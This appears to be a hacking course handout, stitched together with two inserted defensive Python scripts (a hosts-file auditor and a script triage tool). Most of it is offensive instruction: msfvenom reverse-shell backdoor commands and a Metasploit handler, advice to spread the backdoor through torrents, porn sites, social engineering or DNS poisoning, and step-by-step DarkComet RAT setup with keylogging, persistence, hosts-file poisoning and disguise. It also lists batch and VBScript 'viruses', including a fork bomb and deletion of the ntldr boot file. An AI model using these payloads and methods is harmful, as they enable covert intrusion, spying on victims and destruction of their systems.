Practical No 1: Creating a backdoored Windows executable to maintain continuous access.
Step 1: Execute the following command in a new terminal window on your Kali Linux machine.
msfvenom –p windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -f exe
–o filename.exe
For Linux, use the command below:
msfvenom –p linux/x86/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<attacker PORT> -f elf –o
linuxback.elf
Now somehow you have to send this file to the victim machine
Methods to send the file:
   1) If you already have a meterpreter connection from the target you can use upload command to
      upload this backdoor file to the target machine.
   2) If you don’t have any connection to upload it remotely you have to keep this file as a torrent or
      a porn content so whoever visits your page he will download and install the file so he will get
      infected. (Torrents and Porn are most convincing places where people will get infected.)
   3) Or you can keep your own webserver to host the vulnerable file when victim comes to your site
      he can download the malware, you can use social engineering to attract victim towards your
      website.
                                                                                       Chinni Diwakar     1
    4) Or you can perform network MITM attacks or DNS poisoning attacks to redirect victim towards
       you.
For this practical I am using the 3rd option, hosting the file myself.
For that I need to move this file to the webserver location and start the webserver.
After sending the file you need to start a receiver to control the connection.
Starting a Handler Using Metasploit.
Step 1: Type the commands below, one after another, in a blank terminal.
service postgresql start
Msfconsole
After the above commands you will get a prompt like msf>
Inside the msf prompt you need to execute a few more commands:
use multi/handler
set PAYLOAD <the payload you have chosen for msfvenom>
set LHOST <attacker ip given in the msfvenom>
set LPORT <attacker port given in the msfvenom>
show option (to see the configured settings)
exploit
Now as soon as the target downloads and runs the file you can get meterpreter connection on your
attacker machine.
You can execute meterpreter commands to control the target.
Practical No 2: Creating Darkcomet Trojan to infect windows machines.
Download Darkcomet RAT from internet
Create an account in NOIP.com and download the Dynamic Update Client.
Disable your malware defences (and also the firewall) before proceeding with this practical.
After downloading Darkcomet, extract it. You will find an exe application named darkcomet.exe.
Double click on it to launch the Darkcomet RAT creator.
Once you double click on the application software you can see the below given image.
From the above screen click on the darkcomet-RAT button in the top left corner, select server module and
click on full editor.
You will see the image below, where you can configure your new Trojan.
From the above screen click on the security password and enter a password so that only you can
control the bots.
Under process mutex please click on random button to create a random mutex id or you can write your
own.
Give some server ID and also a profile name so that you can identify the Trojan and the settings very
easily among others.
After that please select Active FWB to bypass the firewalls.
With that, the settings under General are complete.
Please click on the network settings to move towards next section of options.
Here on the network settings all you have to do is give your IP address (or Domain name) to get reverse
connection (you can use noip), and also give port number of your choice. Then click on add button.
Under module startup there are several settings that control how the Trojan starts. Check the box
"start the stub with windows", then select the location where the Trojan is placed on the victim
machine, the file name and folder name, and whether or not it is hidden.
Melt after first execution -> gets deleted after Trojan executed successfully.
Persistence installation -> even if you try to delete it comes back always.
You can change the file creation date with the second option as well.
You can make the drop file and parent folder attributes hide and system if you want.
By checking the box on display a message box option, you can show a fake error message on the victim
PC as soon as the victim executes the Trojan, like above shown.
Under Module Shield section you can select as many settings as you want to protect your Trojan file.
Under key logger section you have to make sure that the active offline key logger is checked. If you have
a FTP server you can also try to get logs immediately through FTP server by giving details (if you want.).
Under the hosts file section you can do DNS poisoning by editing the target's hosts file as shown above.
There I am redirecting all facebook.com traffic towards the IP address I mentioned above. You have to
click on addline.
As we don’t have specific working plugins from outside, there is no need to consider the add plugins section.
Under file binder click on the yellow folder icon and select the file you want to bind (attach), then click
on the add file button. When the victim clicks on the Trojan they see the attached file opening, so
they won’t become suspicious.
Under custom icon section select custom icon and select the icon you wish to add to your Trojan so that
it will look good to the victim.
Under the last stub finalization section you can select the output extension name and compression
method then click on build the stub button, then save the Trojan with your favorite name.
Finally the Trojan is created; now we need to do some client settings.
Go to the fourth tab of Darkcomet, socket/net.
Right-click, select addport to listen, give the port number you want, and click listen.
Then click on the blue darkcomet rat button, select the client settings tab and provide the password you
set at the start of the Trojan creation.
You can watch the full video demonstration below.
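From the defender's side, the hosts-file redirection configured in the hosts file section above is simple to audit. The following Python sketch is an added example, not part of the original practical: it parses hosts-file text and reports watched domains that have been pinned to an address. The watch list, function names and sample file are constructed for illustration.

```python
import ipaddress

# Constructed watch list: names that should resolve through DNS, never through
# a local hosts entry. Extend it with the domains your users sign in to.
WATCHED = ("facebook.com", "google.com", "microsoft.com")

def parse_hosts(text):
    """Yield (line_no, ip, hostname) for each mapping in hosts-file text."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()   # drop comments, split columns
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                            # not an address: ignore line
        for name in fields[1:]:
            yield line_no, ip, name.lower().rstrip(".")

def audit_hosts(text, watched=WATCHED):
    """Flag watched names (and subdomains) pinned by the hosts file.
    'redirect' = sent to another host; 'sinkhole' = blackholed locally."""
    findings = []
    for line_no, ip, name in parse_hosts(text):
        if any(name == d or name.endswith("." + d) for d in watched):
            kind = "sinkhole" if ip.is_loopback or ip.is_unspecified else "redirect"
            findings.append((line_no, str(ip), name, kind))
    return findings

# Constructed sample; 192.0.2.10 is a documentation address (RFC 5737).
SAMPLE_HOSTS = """\
# sample hosts file
127.0.0.1    localhost
::1          localhost
192.0.2.10   facebook.com www.facebook.com
0.0.0.0      update.microsoft.com   # blocks updates
10.0.0.5     intranet.example
"""

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```

On Windows the file to feed into audit_hosts is C:\Windows\System32\drivers\etc\hosts; any finding on a workstation that nobody configured by hand is worth an investigation.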
Virus Creation with Batch file programming:
File Flooder virus
@echo off
cd c:\Documents and Settings\%user%\Desktop\
:loop
echo hacked by hacker > hacked%random%
goto loop
Folder flooder virus
@echo off
cd c:\Documents and Settings\%user%\Desktop\
md folder
cd folder
:loop
md hacked%random%g
goto loop
Program Flooder virus
@echo off
:loop
start explorer.exe
start notepad.exe
start calc.exe
start mspaint.exe
start cmd.exe
goto loop
Message annoyer virus
@echo off
:loop
msg * a
msg * b
msg * c
msg * d
msg * e
msg * f
msg * g
goto loop
Fork Bombing Virus
@echo off
:loop
Explorer.exe
call fork.bat
goto loop
OS crash virus
@echo off
cd C:\
attrib –s –h –r ntldr
del ntldr
shutdown –c “Hacked By Hacker” –t 3 –s –F
Save the above code snippets with the .bat file extension and file type set to allfiles.
And execute them to see results.
Virus Creation with Visual Basic Scripting
Copy the following codes into notepad and save with type allfiles and extension .vbs.
Speak Virus
CreateObject("SAPI.SpVoice").Speak"I Kill You"
Scary Prank Virus (Fun virus no damage)
Set WshShell = WScript.CreateObject("WScript.Shell")
strName = wshShell.ExpandEnvironmentStrings( "%USERNAME%" )
x=msgbox ("Critical: Your system is severely affected by multiple threats.. To abort all processes, press
'Abort'. To Scan again, press 'Retry'. To continue all processes, click 'Ignore'." ,2+16, "Virus found by
Windows Defender©")
WScript.sleep 2000
msgbox "Sytem failure in %WINDIR%",48,ERROR
WshShell.Run "cmd"
WScript.sleep 200
wshshell.sendkeys "cls"
WScript.sleep 200
wshshell.sendkeys "{ENTER}"
WScript.sleep 200
wshshell.sendkeys "A"
WScript.sleep 200
wshshell.sendkeys "r"
WScript.sleep 200
wshshell.sendkeys "e"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "y"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "u"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "s"
WScript.sleep 200
wshshell.sendkeys "c"
WScript.sleep 200
wshshell.sendkeys "a"
WScript.sleep 200
wshshell.sendkeys "r"
WScript.sleep 200
wshshell.sendkeys "e"
WScript.sleep 200
wshshell.sendkeys "d"
WScript.sleep 200
wshshell.sendkeys ","
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys strName
WScript.sleep 200
wshshell.sendkeys "?"
x=msgbox ("?",4)
wshshell.sendkeys "{ENTER}"
wshshell.sendkeys "cls"
wshshell.sendkeys "{ENTER}"
if x=6 Then
WScript.sleep 200
wshshell.sendkeys "G"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "d"
WScript.sleep 200
wshshell.sendkeys ","
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "y"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "u"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "s"
WScript.sleep 200
wshshell.sendkeys "h"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "u"
WScript.sleep 200
wshshell.sendkeys "l"
WScript.sleep 200
wshshell.sendkeys "d"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "b"
WScript.sleep 200
wshshell.sendkeys "e"
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "."
wshshell.sendkeys "{ENTER}"
WScript.sleep 100
wshshell.sendkeys "exit"
WScript.sleep 100
wshshell.sendkeys "{ENTER}"
End If
if x=7 Then
WScript.sleep 200
wshshell.sendkeys "N"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "?"
WScript.sleep 500
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "Y"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "u"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "s"
WScript.sleep 200
wshshell.sendkeys "h"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "u"
WScript.sleep 200
wshshell.sendkeys "l"
WScript.sleep 200
wshshell.sendkeys "d"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "b"
WScript.sleep 200
wshshell.sendkeys "e"
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 400
wshshell.sendkeys "{ENTER}"
WScript.sleep 100
wshshell.sendkeys "exit"
WScript.sleep 100
wshshell.sendkeys "{ENTER}"
End If
WshShell.Run "cmd"
WScript.sleep 500
wshshell.sendkeys "dir"
WScript.sleep 100
wshshell.sendkeys "{ENTER}"
WScript.sleep 1000
wshshell.sendkeys "dir"
WScript.sleep 100
wshshell.sendkeys "{ENTER}"
WScript.sleep 2000
wshshell.sendkeys "cls"
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 40
wshshell.sendkeys "prompt deleting cookies..."
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 40
wshshell.sendkeys "cls"
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 2000
wshshell.sendkeys "prompt deleting Users..."
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 40
wshshell.sendkeys "cls"
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 2000
wshshell.sendkeys "prompt deleting drive 'C:'..."
WScript.sleep 200
wshshell.sendkeys "{ENTER}"
WScript.sleep 40
wshshell.sendkeys "cls"
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 1000
x=msgbox ("Are you sure that you want to permanently delete all directories, files, and subfiles in
environment variable: '%ALLDATA%' ? " ,4+32, "C:\")
WScript.sleep 2000
wshshell.sendkeys "prompt deleting system 32..."
WScript.sleep 70
wshshell.sendkeys "{ENTER}"
WScript.sleep 40
wshshell.sendkeys "cls"
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 1000
wshshell.sendkeys "exit"
WScript.sleep 200
wshshell.sendkeys "{ENTER}"
WScript.sleep 4000
msgbox "Just kidding :)"
Disco Keyboard Virus
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
Enter Flood Virus
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Chain Lights Virus
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop
Copy the above given codes into a notepad file and save with .vbs extension name and type as allfiles.
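The batch and VBScript samples in the two sections above share a small set of static tells: a loop with no exit condition wrapped around a resource-consuming command, or a destructive command at top level. The following Python triage sketch is an added example, not part of the original practical, for screening .bat and .vbs attachments before they reach a user; the rule names, function names and shortened samples are constructed for illustration.

```python
import re

# Behaviours that only matter inside a loop with no exit condition.
LOOP_RULES = {
    "process-spawn flood": re.compile(r"^\s*(start\s+\S+|call\s+\S+\.bat)", re.I | re.M),
    "file/folder flood": re.compile(r"^\s*(md|mkdir)\s|>\s*\S*%random%", re.I | re.M),
    "message flood": re.compile(r"^\s*msg\s+\*", re.I | re.M),
    "keystroke injection": re.compile(r"\.sendkeys\b", re.I),
}
# Behaviours worth flagging anywhere in the script.
GLOBAL_RULES = {
    "boot file deletion": re.compile(r"^\s*del\s+.*\bntldr\b", re.I | re.M),
    "forced shutdown": re.compile(r"^\s*shutdown\b", re.I | re.M),
}
BATCH_LOOP = re.compile(r"^:(\w+)\s*$(.*?)^\s*goto\s+:?\1\s*$", re.I | re.M | re.S)
VBS_LOOP = re.compile(r"^\s*do\s*$(.*?)^\s*loop\s*$", re.I | re.M | re.S)

def unbounded_loops(script):
    """Bodies of batch ':label ... goto label' and bare VBScript 'do ... loop'
    blocks that contain no conditional or explicit exit."""
    bodies = [m.group(2) for m in BATCH_LOOP.finditer(script)
              if not re.search(r"^\s*(if|exit)\b", m.group(2), re.I | re.M)]
    bodies += [m.group(1) for m in VBS_LOOP.finditer(script)
               if not re.search(r"\bexit\s+do\b", m.group(1), re.I)]
    return bodies

def triage(script):
    """Return the sorted rule names that fire for one script's text."""
    hits = {name for name, rx in GLOBAL_RULES.items() if rx.search(script)}
    for body in unbounded_loops(script):
        hits |= {name for name, rx in LOOP_RULES.items() if rx.search(body)}
    return sorted(hits)

# Constructed samples, shortened from the patterns shown on this page.
SAMPLES = {
    "flood.bat": "@echo off\n:loop\nstart notepad.exe\ngoto loop\n",
    "leds.vbs": 'Set s = CreateObject("WScript.Shell")\ndo\nwscript.sleep 100\n'
                's.sendkeys "{CAPSLOCK}"\nloop\n',
    "crash.bat": "@echo off\ndel ntldr\nshutdown -s -t 3\n",
    "benign.bat": "@echo off\nset n=0\n:loop\nset /a n+=1\n"
                  "if %n% lss 3 goto loop\necho done\n",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, triage(text))
```

The counter-bounded loop in benign.bat produces no finding, which is the point of checking for an exit condition before applying the loop rules.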
Malware Creation with Construction Kits:
All you have to do is select the function you want and give the virus name, that’s it.